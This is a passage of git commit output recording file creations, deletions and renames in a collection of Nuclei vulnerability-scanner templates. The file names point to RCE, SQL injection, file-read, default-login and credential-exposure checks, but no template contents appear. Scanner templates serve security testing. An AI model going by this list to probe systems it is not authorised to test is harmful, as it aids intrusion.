cname-service-detector-1034.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2018-13393-1037.yaml delete mode 100644 nuclei-templates/Other/cnvd-2018-13393-1038.yaml rename nuclei-templates/Other/{CNVD-2019-01348.yaml => cnvd-2019-01348-1044.yaml} (100%) delete mode 100644 nuclei-templates/Other/cnvd-2019-06255-1049.yaml create mode 100644 nuclei-templates/Other/cnvd-2019-06255-1050.yaml delete mode 100644 nuclei-templates/Other/cnvd-2019-17294.yaml delete mode 100644 
nuclei-templates/Other/cnvd-2019-19299-1051.yaml create mode 100644 nuclei-templates/Other/cnvd-2019-19299-1052.yaml rename nuclei-templates/Other/{CNVD-2019-32204.yaml => cnvd-2019-32204-1054.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2020-46552-1060.yaml delete mode 100644 nuclei-templates/Other/cnvd-2020-46552.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-56167-1064.yaml delete mode 100644 nuclei-templates/Other/cnvd-2020-62422-1067.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-62422-1069.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-10543-1082.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-10543-1084.yaml rename nuclei-templates/Other/{cnvd-2021-15822-1092.yaml => cnvd-2021-15822-1093.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2021-15824-1096.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-15824-1097.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-17369-1102.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-26422-1103.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-26422-1104.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-30167-1108.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-30167-1109.yaml rename nuclei-templates/Other/{cobbler-default-login-1121.yaml => cobbler-default-login-1120.yaml} (100%) create mode 100644 nuclei-templates/Other/cockpit-detect-1125.yaml delete mode 100644 nuclei-templates/Other/cockpit-detect-1127.yaml rename nuclei-templates/Other/{cockpit-workflow.yaml => cockpit-workflow-1129.yaml} (100%) create mode 100644 nuclei-templates/Other/codemeter-webadmin-panel-1135.yaml delete mode 100644 nuclei-templates/Other/codemeter-webadmin-panel-1137.yaml rename nuclei-templates/Other/{codian-mcu-login-1140.yaml => codian-mcu-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/cofense-vision-panel-1141.yaml create mode 100644 nuclei-templates/Other/cofense-vision-panel-1142.yaml rename 
nuclei-templates/Other/{cold-fusion-cfcache-map-1149.yaml => cold-fusion-cfcache-map.yaml} (100%) delete mode 100644 nuclei-templates/Other/coldfusion-administrator-login-1145.yaml create mode 100644 nuclei-templates/Other/coldfusion-administrator-login.yaml create mode 100644 nuclei-templates/Other/coldfusion-debug-xss-1152.yaml delete mode 100644 nuclei-templates/Other/coldfusion-debug-xss-1154.yaml create mode 100644 nuclei-templates/Other/commax-biometric-auth-bypass-1157.yaml delete mode 100644 nuclei-templates/Other/commax-biometric-auth-bypass.yaml delete mode 100644 nuclei-templates/Other/commax-credentials-disclosure-1158.yaml create mode 100644 nuclei-templates/Other/commax-credentials-disclosure.yaml delete mode 100644 nuclei-templates/Other/comtrend-password-exposure-1166.yaml create mode 100644 nuclei-templates/Other/comtrend-password-exposure.yaml create mode 100644 nuclei-templates/Other/concourse-ci-panel-1169.yaml delete mode 100644 nuclei-templates/Other/concourse-ci-panel.yaml create mode 100644 nuclei-templates/Other/concrete-xss-1177.yaml delete mode 100644 nuclei-templates/Other/concrete-xss-1178.yaml delete mode 100644 nuclei-templates/Other/concrete5-install-1171.yaml create mode 100644 nuclei-templates/Other/concrete5-install.yaml create mode 100644 nuclei-templates/Other/concrete5-panel-1172.yaml delete mode 100644 nuclei-templates/Other/concrete5-panel.yaml rename nuclei-templates/Other/{configuration-listing-1183.yaml => configuration-listing-1182.yaml} (100%) create mode 100644 nuclei-templates/Other/confluence-detect-1187.yaml delete mode 100644 nuclei-templates/Other/confluence-detect.yaml rename nuclei-templates/Other/{confluence-ssrf-sharelinks-1191.yaml => confluence-ssrf-sharelinks-1192.yaml} (100%) rename nuclei-templates/Other/{contacam-1197.yaml => contacam.yaml} (100%) delete mode 100644 nuclei-templates/Other/content-scheme-1205.yaml create mode 100644 nuclei-templates/Other/content-scheme.yaml create mode 100644 
nuclei-templates/Other/contentkeeper-detect-1203.yaml delete mode 100644 nuclei-templates/Other/contentkeeper-detect.yaml create mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1209.yaml delete mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1211.yaml create mode 100644 nuclei-templates/Other/coremail-config-disclosure-1215.yaml delete mode 100644 nuclei-templates/Other/coremail-config-disclosure.yaml rename nuclei-templates/Other/{couchbase-buckets-api-1232.yaml => couchbase-buckets-api-1233.yaml} (100%) rename nuclei-templates/Other/{couchdb-exposure-1239.yaml => couchdb-exposure-1238.yaml} (100%) delete mode 100644 nuclei-templates/Other/craft-cms-detect-1247.yaml create mode 100644 nuclei-templates/Other/craft-cms-detect.yaml create mode 100644 nuclei-templates/Other/craftcms-admin-panel-1245.yaml delete mode 100644 nuclei-templates/Other/craftcms-admin-panel.yaml create mode 100644 nuclei-templates/Other/credential-exposure-1249.yaml delete mode 100644 nuclei-templates/Other/credential-exposure-file.yaml delete mode 100644 nuclei-templates/Other/credentials-1257.yaml create mode 100644 nuclei-templates/Other/credentials-disclosure-1252.yaml delete mode 100644 nuclei-templates/Other/credentials-disclosure.yaml create mode 100644 nuclei-templates/Other/credentials.yaml delete mode 100644 nuclei-templates/Other/crmeb-sqli.yaml rename nuclei-templates/Other/{crush-ftp-detect.yaml => crush-ftp-detect-1271.yaml} (100%) rename nuclei-templates/Other/{crush-ftp-login-1275.yaml => crush-ftp-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi-1281.yaml create mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi.yaml create mode 100644 nuclei-templates/Other/cs141-default-login-1280.yaml delete mode 100644 nuclei-templates/Other/cs141-default-login.yaml delete mode 100644 nuclei-templates/Other/csrfguard-detect-1291.yaml create mode 100644 nuclei-templates/Other/csrfguard-detect.yaml delete mode 
100644 nuclei-templates/Other/custom-solr-file-read.yaml delete mode 100644 nuclei-templates/Other/custom-xss-check.yaml create mode 100644 nuclei-templates/Other/custom_nuclei-7.yaml rename nuclei-templates/Other/{cx-cloud-login.yaml => cx-cloud-login-6765.yaml} (100%) rename nuclei-templates/Other/{d-link-arbitary-fileread-7045.yaml => d-link-arbitary-fileread.yaml} (100%) create mode 100644 nuclei-templates/Other/d-link-wireless-7050.yaml delete mode 100644 nuclei-templates/Other/d-link-wireless.yaml create mode 100644 nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml create mode 100644 "nuclei-templates/Other/dahua-\346\231\272\346\205\247\345\233\255\345\214\272\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260.yaml" create mode 100644 nuclei-templates/Other/darkstat-detect-6767.yaml delete mode 100644 nuclei-templates/Other/darkstat-detect.yaml delete mode 100644 nuclei-templates/Other/database-error-6770.yaml create mode 100644 nuclei-templates/Other/database-error.yaml rename nuclei-templates/Other/{db-schema-6783.yaml => db-schema.yaml} (100%) delete mode 100644 nuclei-templates/Other/dbeaver-credentials-6779.yaml create mode 100644 nuclei-templates/Other/dbeaver-credentials-6782.yaml delete mode 100644 nuclei-templates/Other/dead-host-with-cname-6786.yaml create mode 100644 nuclei-templates/Other/dead-host-with-cname-6787.yaml create mode 100644 nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6794.yaml delete mode 100644 nuclei-templates/Other/dedecms-carbuyaction-fileinclude.yaml create mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli-6796.yaml delete mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli-6798.yaml rename nuclei-templates/Other/{dedecms-openredirect-6803.yaml => dedecms-openredirect-6802.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-apache-test-page-6816.yaml create mode 100644 nuclei-templates/Other/default-apache-test-page-6817.yaml create mode 100644 
nuclei-templates/Other/default-apache2-page-6806.yaml delete mode 100644 nuclei-templates/Other/default-apache2-page.yaml create mode 100644 nuclei-templates/Other/default-codeigniter-page-6831.yaml delete mode 100644 nuclei-templates/Other/default-codeigniter-page-6832.yaml create mode 100644 nuclei-templates/Other/default-django-page-6840.yaml delete mode 100644 nuclei-templates/Other/default-django-page.yaml delete mode 100644 nuclei-templates/Other/default-fastcgi-page-6844.yaml create mode 100644 nuclei-templates/Other/default-fastcgi-page-6845.yaml rename nuclei-templates/Other/{default-fedora-page.yaml => default-fedora-page-6850.yaml} (100%) rename nuclei-templates/Other/{default-ibm-http-server-6857.yaml => default-ibm-http-server.yaml} (100%) rename nuclei-templates/Other/{default-iis7-page.yaml => default-iis7-page-6859.yaml} (100%) rename nuclei-templates/Other/{default-jetty-page-6864.yaml => default-jetty-page-6862.yaml} (100%) create mode 100644 nuclei-templates/Other/default-lighttpd-page-6866.yaml delete mode 100644 nuclei-templates/Other/default-lighttpd-page.yaml rename nuclei-templates/Other/{default-microsoft-azure-page.yaml => default-microsoft-azure-page-6874.yaml} (100%) create mode 100644 nuclei-templates/Other/default-movable-page-6878.yaml delete mode 100644 nuclei-templates/Other/default-movable-page.yaml delete mode 100644 nuclei-templates/Other/default-nginx-page-6881.yaml create mode 100644 nuclei-templates/Other/default-nginx-page-6882.yaml rename nuclei-templates/Other/{default-openresty-6886.yaml => default-openresty-6884.yaml} (100%) rename nuclei-templates/Other/{default-redhat-test-page-6903.yaml => default-redhat-test-page-6904.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-ssltls-test-page-6907.yaml create mode 100644 nuclei-templates/Other/default-ssltls-test-page-6908.yaml rename nuclei-templates/Other/{default-tomcat-page.yaml => default-tomcat-page-6911.yaml} (100%) delete mode 100644 
nuclei-templates/Other/default-windows-server-page-6912.yaml create mode 100644 nuclei-templates/Other/default-windows-server-page.yaml create mode 100644 nuclei-templates/Other/defectdojo-panel-6916.yaml delete mode 100644 nuclei-templates/Other/defectdojo-panel.yaml create mode 100644 nuclei-templates/Other/dell-idrac-default-login-6942.yaml delete mode 100644 nuclei-templates/Other/dell-idrac-default-login-6943.yaml rename nuclei-templates/Other/{dell-idrac-workflow.yaml => dell-idrac-workflow-6947.yaml} (100%) create mode 100644 nuclei-templates/Other/dell-idrac6-detect-6918.yaml delete mode 100644 nuclei-templates/Other/dell-idrac6-detect-6919.yaml create mode 100644 nuclei-templates/Other/dell-idrac7-detect-6922.yaml delete mode 100644 nuclei-templates/Other/dell-idrac7-detect-6924.yaml delete mode 100644 nuclei-templates/Other/dell-idrac9-default-login-6934.yaml create mode 100644 nuclei-templates/Other/dell-idrac9-default-login.yaml create mode 100644 nuclei-templates/Other/dell-idrac9-detect-6937.yaml delete mode 100644 nuclei-templates/Other/dell-idrac9-detect.yaml create mode 100644 nuclei-templates/Other/dell-openmanager-login-6949.yaml delete mode 100644 nuclei-templates/Other/dell-openmanager-login-6950.yaml create mode 100644 nuclei-templates/Other/dell-wyse-login-6954.yaml delete mode 100644 nuclei-templates/Other/dell-wyse-login-6955.yaml create mode 100644 nuclei-templates/Other/deprecated-tls-6959.yaml delete mode 100644 nuclei-templates/Other/deprecated-tls.yaml create mode 100644 nuclei-templates/Other/detect-addpac-voip-gateway-6963.yaml delete mode 100644 nuclei-templates/Other/detect-addpac-voip-gateway.yaml delete mode 100644 nuclei-templates/Other/detect-all-takovers.yaml delete mode 100644 nuclei-templates/Other/detect-dns-over-https-6969.yaml create mode 100644 nuclei-templates/Other/detect-dns-over-https-6970.yaml create mode 100644 nuclei-templates/Other/detect-drone-config-6973.yaml delete mode 100644 
nuclei-templates/Other/detect-drone-config.yaml create mode 100644 nuclei-templates/Other/detect-jabber-xmpp-6974.yaml delete mode 100644 nuclei-templates/Other/detect-jabber-xmpp.yaml create mode 100644 nuclei-templates/Other/detect-options-method-6977.yaml delete mode 100644 nuclei-templates/Other/detect-options-method.yaml create mode 100644 nuclei-templates/Other/detect-rsyncd-6979.yaml delete mode 100644 nuclei-templates/Other/detect-rsyncd-6980.yaml rename nuclei-templates/Other/{dicoogle-pacs-lfi-6993.yaml => dicoogle-pacs-lfi.yaml} (100%) rename nuclei-templates/Other/{Digital-Signage-rce.yaml => digital-signage-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/dir-listing-7008.yaml create mode 100644 nuclei-templates/Other/dir-listing.yaml create mode 100644 nuclei-templates/Other/directadmin-login-panel-7000.yaml delete mode 100644 nuclei-templates/Other/directadmin-login-panel-7001.yaml delete mode 100644 nuclei-templates/Other/discourse-xss-7013.yaml create mode 100644 nuclei-templates/Other/discourse-xss.yaml rename nuclei-templates/Other/{django-admin-panel.yaml => django-admin-panel-7021.yaml} (100%) delete mode 100644 nuclei-templates/Other/django-debug-detect-7027.yaml rename nuclei-templates/Other/{django-debug-exposure-7031.yaml => django-debug-exposure-csrf.yaml} (100%) create mode 100644 nuclei-templates/Other/django-debug.yaml rename nuclei-templates/Other/{django-framework-exceptions-7033.yaml => django-framework-exceptions-7034.yaml} (100%) create mode 100644 nuclei-templates/Other/django-secret-key.yaml delete mode 100644 nuclei-templates/Other/django-secret.key.yaml create mode 100644 nuclei-templates/Other/dlink-850L-info-leak.yaml delete mode 100644 nuclei-templates/Other/dlink-850l-info-leak-7038.yaml delete mode 100644 nuclei-templates/Other/dns-waf-detect-7052.yaml create mode 100644 nuclei-templates/Other/dns-waf-detect-7053.yaml delete mode 100644 nuclei-templates/Other/dnssec-detection-7051.yaml create mode 100644 
nuclei-templates/Other/dnssec-detection.yaml rename nuclei-templates/Other/{DocCMS-keyword-sqli.yaml => doccms-keyword-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/docker-api.yaml create mode 100644 nuclei-templates/Other/docker-registry-7067.yaml delete mode 100644 nuclei-templates/Other/docker-registry-7068.yaml delete mode 100644 nuclei-templates/Other/dockercfg-config-7055.yaml create mode 100644 nuclei-templates/Other/dockercfg-config-7056.yaml create mode 100644 nuclei-templates/Other/dockerfile-hidden-disclosure-7063.yaml delete mode 100644 nuclei-templates/Other/dockerfile-hidden-disclosure.yaml create mode 100644 nuclei-templates/Other/dokmee ecm.yaml delete mode 100644 nuclei-templates/Other/dolphinscheduler-default-login-7072.yaml create mode 100644 nuclei-templates/Other/dolphinscheduler-default-login-7073.yaml create mode 100644 nuclei-templates/Other/dom-xss-7079.yaml delete mode 100644 nuclei-templates/Other/domcfg-page-7077.yaml create mode 100644 nuclei-templates/Other/domcfg-page.yaml delete mode 100644 nuclei-templates/Other/domxss.yaml rename nuclei-templates/Other/{dotclear-detect-7083.yaml => dotclear-detect-7084.yaml} (100%) create mode 100644 nuclei-templates/Other/dotnetcms-sqli-7089.yaml create mode 100644 nuclei-templates/Other/druid-console-exposure-7092.yaml delete mode 100644 nuclei-templates/Other/druid-console-exposure-7094.yaml rename nuclei-templates/Other/{druid-default-login-7096.yaml => druid-default-login-7097.yaml} (100%) delete mode 100644 nuclei-templates/Other/druid-monitor-7100.yaml create mode 100644 nuclei-templates/Other/druid-monitor-7102.yaml rename nuclei-templates/Other/{drupal-install-7106.yaml => drupal-install-7107.yaml} (100%) rename nuclei-templates/Other/{drupal-user-enum-ajax-7109.yaml => drupal-user-enum-ajax-7111.yaml} (100%) rename nuclei-templates/Other/{ds_store.yaml => ds_store-7119.yaml} (100%) rename nuclei-templates/Other/{DSE855.yaml => dse855.yaml} (100%) create mode 100644 
nuclei-templates/Other/dss-download-fileread-7116.yaml delete mode 100644 nuclei-templates/Other/dss-download-fileread-7117.yaml delete mode 100644 nuclei-templates/Other/duomicms-sql-injection-7122.yaml create mode 100644 nuclei-templates/Other/duomicms-sql-injection-7125.yaml rename nuclei-templates/Other/{dvwa-default-login-7129.yaml => dvwa-default-login.yaml} (100%) rename nuclei-templates/Other/{dvwa-headless-automatic-login-7132.yaml => dvwa-headless-automatic-login-7133.yaml} (100%) create mode 100644 nuclei-templates/Other/dwr-index-detect-7134.yaml delete mode 100644 nuclei-templates/Other/dwr-index-detect-7135.yaml create mode 100644 nuclei-templates/Other/dwsync-exposure-7139.yaml delete mode 100644 nuclei-templates/Other/dwsync-exposure.yaml rename nuclei-templates/Other/{dynamic-broadcast-receiver.yaml => dynamic-broadcast-receiver-7140.yaml} (100%) delete mode 100644 nuclei-templates/Other/dynamicweb-panel-7143.yaml create mode 100644 nuclei-templates/Other/dynamicweb-panel-7144.yaml rename nuclei-templates/Other/{dzs-zoomsounds-listing.yaml => dzs-zoomsounds-listing-7147.yaml} (100%) delete mode 100644 nuclei-templates/Other/easy-media-gallery-pro-listing-7150.yaml create mode 100644 nuclei-templates/Other/easy-media-gallery-pro-listing-7153.yaml create mode 100644 nuclei-templates/Other/eatery-restaurant-open-redirect-7158.yaml delete mode 100644 nuclei-templates/Other/eatery-restaurant-open-redirect.yaml create mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload-7169.yaml delete mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload.yaml rename nuclei-templates/Other/{ecology-filedownload-directory-traversal-7171.yaml => ecology-filedownload-directory-traversal.yaml} (100%) create mode 100644 nuclei-templates/Other/ecology-oa-HrmCareerApplyPerView-sqli.yaml delete mode 100644 nuclei-templates/Other/ecology_E-Office_Uploadify_FileUpload.yaml create mode 100644 nuclei-templates/Other/eg-manager-detect-7184.yaml delete mode 
100644 nuclei-templates/Other/eg-manager-detect.yaml delete mode 100644 nuclei-templates/Other/elFinder-path-traversal.yaml create mode 100644 nuclei-templates/Other/elasticbeantalk-takeover-7188.yaml delete mode 100644 nuclei-templates/Other/elasticbeantalk-takeover.yaml delete mode 100644 nuclei-templates/Other/elasticsearch-7196.yaml create mode 100644 nuclei-templates/Other/elasticsearch.yaml delete mode 100644 nuclei-templates/Other/elex-woocommerce-xss-7200.yaml create mode 100644 nuclei-templates/Other/elex-woocommerce-xss.yaml create mode 100644 nuclei-templates/Other/elfinder-path-traversal(1).yaml delete mode 100644 nuclei-templates/Other/elfinder-version-7205.yaml create mode 100644 nuclei-templates/Other/elfinder-version.yaml create mode 100644 nuclei-templates/Other/emcecom-default-login-7211.yaml delete mode 100644 nuclei-templates/Other/emcecom-default-login-7212.yaml rename nuclei-templates/Other/{EmpireCMS-rate-sqli.yaml => empirecms-rate-sqli.yaml} (100%) rename nuclei-templates/Other/{empirecms-xss-7220.yaml => empirecms-xss.yaml} (100%) rename nuclei-templates/Other/{emqx-default-login-7222.yaml => emqx-default-login-7221.yaml} (100%) rename nuclei-templates/Other/{ems-login-panel-7225.yaml => ems-login-panel-7223.yaml} (100%) create mode 100644 nuclei-templates/Other/env.yaml rename nuclei-templates/Other/{epmp-login-7229.yaml => epmp-login-7231.yaml} (100%) create mode 100644 nuclei-templates/Other/epson-projector-detect-7238.yaml delete mode 100644 nuclei-templates/Other/epson-projector-detect.yaml delete mode 100644 nuclei-templates/Other/epson-web-control-detect-7242.yaml create mode 100644 nuclei-templates/Other/epson-web-control-detect.yaml rename nuclei-templates/Other/{epson-wf-series-7244.yaml => epson-wf-series.yaml} (100%) delete mode 100644 nuclei-templates/Other/erp-nc-directory-traversal-7245.yaml create mode 100644 nuclei-templates/Other/erp-nc-directory-traversal-7248.yaml create mode 100644 
nuclei-templates/Other/error-based-sql-injection-7249.yaml delete mode 100644 nuclei-templates/Other/error-based-sql-injection.yaml rename nuclei-templates/Other/{time.yaml => error-based.yaml} (100%) rename nuclei-templates/Other/{error-logs-7255.yaml => error-logs-7252.yaml} (100%) create mode 100644 nuclei-templates/Other/esmtprc-config-7258.yaml delete mode 100644 nuclei-templates/Other/esmtprc-config.yaml rename nuclei-templates/Other/{etcd-keys-7261.yaml => etcd-keys.yaml} (100%) delete mode 100644 nuclei-templates/Other/etouch-v2-sqli-7266.yaml create mode 100644 nuclei-templates/Other/etouch-v2-sqli.yaml delete mode 100644 nuclei-templates/Other/exacqvision-default-login-7274.yaml create mode 100644 nuclei-templates/Other/exacqvision-default-login-7275.yaml delete mode 100644 nuclei-templates/Other/example-template.yaml delete mode 100644 nuclei-templates/Other/exploit-cve-2022-1388.yaml rename nuclei-templates/Other/{expn-mail-detect-7279.yaml => expn-mail-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-adb-7280.yaml delete mode 100644 nuclei-templates/Other/exposed-adb-7281.yaml rename nuclei-templates/Other/{exposed-alps-spring.yaml => exposed-alps-spring-7285.yaml} (100%) rename nuclei-templates/Other/{exposed-bitkeeper.yaml => exposed-bitkeeper-7291.yaml} (100%) rename nuclei-templates/Other/{exposed-darcs-7298.yaml => exposed-darcs.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-docker-api-7301.yaml delete mode 100644 nuclei-templates/Other/exposed-glances-api-7309.yaml create mode 100644 nuclei-templates/Other/exposed-glances-api.yaml delete mode 100644 nuclei-templates/Other/exposed-jquery-file-upload-7315.yaml create mode 100644 nuclei-templates/Other/exposed-jquery-file-upload.yaml delete mode 100644 nuclei-templates/Other/exposed-kibana-7319.yaml create mode 100644 nuclei-templates/Other/exposed-kibana-7320.yaml rename nuclei-templates/Other/{exposed-nomad-7329.yaml => exposed-nomad.yaml} (100%) create mode 
100644 nuclei-templates/Other/exposed-redis-7335.yaml delete mode 100644 nuclei-templates/Other/exposed-redis-7336.yaml rename nuclei-templates/Other/{exposed-service-now-7343.yaml => exposed-service-now-7342.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-springboot.yaml rename nuclei-templates/Other/{exposed-sqlite-manager.yaml => exposed-sqlite-manager-7350.yaml} (100%) rename nuclei-templates/Other/{exposed-svn-7351.yaml => exposed-svn-7354.yaml} (100%) delete mode 100644 nuclei-templates/Other/exposed-webalizer-7358.yaml create mode 100644 nuclei-templates/Other/exposed-webalizer.yaml rename nuclei-templates/Other/{detection-zookeeper.yaml => exposed-zookeeper-7363.yaml} (100%) rename nuclei-templates/Other/{express-lfr-post (copy 1).yaml => expresslfr_post.yaml} (100%) delete mode 100644 nuclei-templates/Other/exsi-system-7366.yaml create mode 100644 nuclei-templates/Other/exsi-system.yaml rename nuclei-templates/Other/{extreme-netconfig-ui.yaml => extreme-netconfig-ui-7372.yaml} (100%) create mode 100644 nuclei-templates/Other/f-secure-policy-manager-7564.yaml delete mode 100644 nuclei-templates/Other/f-secure-policy-manager.yaml create mode 100644 nuclei-templates/Other/facebook-client-id-7385.yaml delete mode 100644 nuclei-templates/Other/facebook-client-id.yaml delete mode 100644 nuclei-templates/Other/facebook-secrets.yaml rename nuclei-templates/Other/{fanruan-channel-deserialization.yaml => fanruan-deserialization.yaml} (100%) rename nuclei-templates/Other/{fanruanoa2012-disclosure-7390.yaml => fanruanoa2012-disclosure.yaml} (100%) delete mode 100644 nuclei-templates/Other/faraday-login-7395.yaml create mode 100644 nuclei-templates/Other/faraday-login-7397.yaml rename nuclei-templates/Other/{fastapi-docs-7399.yaml => fastapi-docs-7398.yaml} (100%) create mode 100644 nuclei-templates/Other/fastjson-1-2-41-rce-7403.yaml delete mode 100644 nuclei-templates/Other/fastjson-1-2-41-rce-7404.yaml rename 
nuclei-templates/Other/{fastjson-1-2-43-rce.yaml => fastjson-1-2-43-rce-7412.yaml} (100%) delete mode 100644 nuclei-templates/Other/fastjson-1-2-47-rce-7415.yaml create mode 100644 nuclei-templates/Other/fastjson-1-2-47-rce.yaml create mode 100644 nuclei-templates/Other/fastjson-1-2-62-rce-7420.yaml delete mode 100644 nuclei-templates/Other/fastjson-1-2-62-rce.yaml rename nuclei-templates/Other/{fastjson-1-2-67-rce-7423.yaml => fastjson-1-2-67-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/fastjson-1-2-68-rce-7425.yaml create mode 100644 nuclei-templates/Other/fastjson-1-2-68-rce.yaml delete mode 100644 nuclei-templates/Other/fatpipe-auth-bypass-7431.yaml create mode 100644 nuclei-templates/Other/fatpipe-auth-bypass.yaml rename nuclei-templates/Other/{fatpipe-ipvpn-panel-7436.yaml => fatpipe-ipvpn-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/favicon-detection-7441.yaml create mode 100644 nuclei-templates/Other/favicon-detection.yaml create mode 100644 nuclei-templates/Other/fcm-server-key-7452.yaml delete mode 100644 nuclei-templates/Other/fcm-server-key-7453.yaml create mode 100644 nuclei-templates/Other/feedpress-takeover-7456.yaml delete mode 100644 nuclei-templates/Other/feedpress-takeover-7457.yaml delete mode 100644 nuclei-templates/Other/feifeicms-lfr-7462.yaml create mode 100644 nuclei-templates/Other/feifeicms-lfr-7466.yaml create mode 100644 nuclei-templates/Other/file-scheme-7468.yaml delete mode 100644 nuclei-templates/Other/file-scheme-7469.yaml delete mode 100644 nuclei-templates/Other/filezilla-7470.yaml create mode 100644 nuclei-templates/Other/filezilla.yaml rename nuclei-templates/Other/{fiorilaunchpad-logon-7484.yaml => fiorilaunchpad-logon.yaml} (100%) create mode 100644 nuclei-templates/Other/firebase-database-7489.yaml delete mode 100644 nuclei-templates/Other/firebase-database-7490.yaml delete mode 100644 nuclei-templates/Other/firebase-detect-7493.yaml create mode 100644 
nuclei-templates/Other/firebase-detect-7494.yaml create mode 100644 nuclei-templates/Other/firebase-urls-7498.yaml delete mode 100644 nuclei-templates/Other/firebase-urls-7499.yaml rename nuclei-templates/Other/{fireware-xtm-user-authentication-7503.yaml => fireware-xtm-user-authentication.yaml} (100%) delete mode 100644 nuclei-templates/Other/flexbe-takeover-7505.yaml create mode 100644 nuclei-templates/Other/flexbe-takeover-7506.yaml delete mode 100644 nuclei-templates/Other/flightpath-panel-7508.yaml create mode 100644 nuclei-templates/Other/flightpath-panel.yaml delete mode 100644 nuclei-templates/Other/flink-exposure-7509.yaml create mode 100644 nuclei-templates/Other/flink-exposure.yaml rename nuclei-templates/Other/{flir-default-login.yaml => flir-default-login-7513.yaml} (100%) create mode 100644 nuclei-templates/Other/forcepoint-7529.yaml delete mode 100644 nuclei-templates/Other/forcepoint.yaml create mode 100644 nuclei-templates/Other/foulenzer-subdomain-tk (copy 1).yaml delete mode 100644 nuclei-templates/Other/freshdesk-takeover-7540.yaml create mode 100644 nuclei-templates/Other/freshdesk-takeover.yaml delete mode 100644 nuclei-templates/Other/front-page-misconfig-7547.yaml create mode 100644 nuclei-templates/Other/front-page-misconfig-7548.yaml delete mode 100644 nuclei-templates/Other/frp-default-login-7557.yaml create mode 100644 nuclei-templates/Other/frp-default-login-7559.yaml create mode 100644 nuclei-templates/Other/ftp-default-credentials.yaml delete mode 100644 nuclei-templates/Other/ftp-default-creds.yaml create mode 100644 nuclei-templates/Other/ftpconfig-7565.yaml delete mode 100644 nuclei-templates/Other/ftpconfig-7566.yaml delete mode 100644 nuclei-templates/Other/gSOAP-LFl.yaml create mode 100644 nuclei-templates/Other/ganglia-xml-grid-monitor-7573.yaml delete mode 100644 nuclei-templates/Other/ganglia-xml-grid-monitor.yaml create mode 100644 nuclei-templates/Other/gemfury-takeover-7576.yaml delete mode 100644 
nuclei-templates/Other/gemfury-takeover-7579.yaml rename nuclei-templates/Other/{general-tokens-7580.yaml => general-tokens-7586.yaml} (100%) delete mode 100644 nuclei-templates/Other/generic-linux-lfi-7588.yaml create mode 100644 nuclei-templates/Other/generic-linux-lfi-7589.yaml delete mode 100644 nuclei-templates/Other/generic-windows-lfi-7592.yaml create mode 100644 nuclei-templates/Other/generic-windows-lfi.yaml delete mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi-7595.yaml create mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi-7596.yaml delete mode 100644 nuclei-templates/Other/geovision-geowebserver-xss-7600.yaml create mode 100644 nuclei-templates/Other/geovision-geowebserver-xss.yaml delete mode 100644 nuclei-templates/Other/get-override-sni.yaml rename nuclei-templates/Other/{getresponse-takeover-7609.yaml => getresponse-takeover-7608.yaml} (100%) create mode 100644 nuclei-templates/Other/getsimple-cms-detector-7613.yaml delete mode 100644 nuclei-templates/Other/getsimple-cms-detector.yaml create mode 100644 nuclei-templates/Other/getsimple-installation-7618.yaml delete mode 100644 nuclei-templates/Other/getsimple-installation.yaml rename nuclei-templates/Other/{GetSimple-leakage.yaml => getsimple-leakage.yaml} (100%) delete mode 100644 nuclei-templates/Other/ghost-takeover-7620.yaml create mode 100644 nuclei-templates/Other/ghost-takeover-7621.yaml create mode 100644 nuclei-templates/Other/git-config-7635.yaml delete mode 100644 nuclei-templates/Other/git-config-7636.yaml rename nuclei-templates/Other/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7631.yaml} (100%) delete mode 100644 nuclei-templates/Other/git-credentials-disclosure-7639.yaml create mode 100644 nuclei-templates/Other/git-credentials-disclosure.yaml delete mode 100644 nuclei-templates/Other/git-mailmap-7710.yaml create mode 100644 nuclei-templates/Other/git-mailmap.yaml rename nuclei-templates/Other/{gitbook-detect.yaml => 
